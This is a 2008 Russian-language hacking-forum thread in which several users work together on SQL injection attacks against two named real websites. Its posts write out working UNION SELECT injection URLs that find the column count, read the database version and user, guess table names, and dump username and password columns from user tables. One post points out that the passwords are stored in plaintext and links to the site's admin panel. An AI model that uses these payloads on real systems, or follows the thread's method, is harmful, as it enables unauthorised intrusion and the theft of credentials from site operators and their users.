03.08.2008, 23:56
|
|
Постоянный
Регистрация: 15.06.2008
Сообщений: 941
Провел на форуме:
5111568
Репутация:
2399
|
|
привет. я только учусь =)
нашол SQL на http://www.aquarell-sts.ru/products/index.php?id=50'
подобрал количество: http://www.aquarell-sts.ru/products/index.php?id=-1+union+select+1,2,3/* - вот, вроде, 3 =)
также могу подставить вместо 2 например user(), database(), etc..
НО пробую так:
http://www.aquarell-sts.ru/products/index.php?id=50+union+select+1,user(),3+from+mysql .user/*
в ответ:
SELECT command denied to user 'a2513_aquarell'@'lbarbero-15.m-10.ru' for table 'user'
типа команда SELECT для юзера a2513_aquarell ЗАпрещена =(
что мне делать? =*)
|
|
|
04.08.2008, 00:01
|
|
Постоянный
Регистрация: 28.09.2007
Сообщений: 820
Провел на форуме:
6722038
Репутация:
1385
|
|
тебе запрещён селект из таблы юзер .. тк кк версия 4ая - ищи другие таблы ..
|
|
|
|
04.08.2008, 00:08
|
|
Постоянный
Регистрация: 15.06.2008
Сообщений: 941
Провел на форуме:
5111568
Репутация:
2399
|
|
таблици искать перебором?
http://www.aquarell-sts.ru/products/index.php?id=50+union+select+1,user(),3+from+table/*
и table перебереть брутом?
|
|
|
|
04.08.2008, 00:10
|
|
Постоянный
Регистрация: 15.06.2008
Сообщений: 941
Провел на форуме:
5111568
Репутация:
2399
|
|
http://www.aquarell-sts.ru/products/index.php?id=-1+union+select+111,222,333+from+users/* подходит =)
|
|
|
|
04.08.2008, 00:21
|
|
Members of Antichat - Level 5
Регистрация: 23.08.2007
Сообщений: 417
Провел на форуме:
14324684
Репутация:
3908
|
|
Сообщение от eLWAux
http://www.aquarell-sts.ru/products/index.php?id=-1+union+select+111,222,333+from+users/* подходит =)
Код:
http://www.aquarell-sts.ru/products/index.php?id=-1+union+select+111,concat(login,0x3a,pwd),333+from+users/*
Пароли в открытом виде, админка:
http://www.aquarell-sts.ru/admin/
|
|
|
|
04.08.2008, 01:06
|
|
Постоянный
Регистрация: 15.06.2008
Сообщений: 941
Провел на форуме:
5111568
Репутация:
2399
|
|
Ded MustD!e:
СПАСИБО!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
а если не секрет мож мне россказать как ти узнал про login и pwd?
|
|
|
|
04.08.2008, 01:58
|
|
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552
Репутация:
568
|
|
eLWAux
он их просто подобрал (угадал).
|
|
|
|
04.08.2008, 03:27
|
|
Участник форума
Регистрация: 17.06.2008
Сообщений: 214
Провел на форуме:
964766
Репутация:
228
|
|
http://www.mbc.edu - сайт
/news/r_detail.asp?id=2087+union+select+1,2,3,4,5,6,7/* - точное кол-во.
Но вывод куда-то пропал  . Нигде нету.
Это blind injection ? |
|
|
|
04.08.2008, 03:34
|
|
Постоянный
Регистрация: 28.09.2007
Сообщений: 820
Провел на форуме:
6722038
Репутация:
1385
|
|
лови ))
http://www.mbc.edu/news/r_detail.asp?id=-2087+union+select+1,version(),3,4,5,6,7/*
======================
http://www.mbc.edu/news/r_detail.asp?id=-2087+union+select+1,concat_ws(0x3a,username,pword_ hash),3,4,5,6,7+from+user/*
что за тип хеша - не знаю 
можт кодировка !?
Последний раз редактировалось 159932; 04.08.2008 в 03:38..
|
|
|
|
04.08.2008, 03:35
|
|
Участник форума
Регистрация: 17.06.2008
Сообщений: 214
Провел на форуме:
964766
Репутация:
228
|
|
Сообщение от 159932
лови ))
http://www.mbc.edu/news/r_detail.asp?id=-2087+union+select+1,version(),3,4,5,6,7/*
Ух какая в минусе сила. Спасибо! 
Угу, чет хэш загадочный.  ... Пойду гуглить.
Последний раз редактировалось USAkid; 04.08.2008 в 03:45..
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
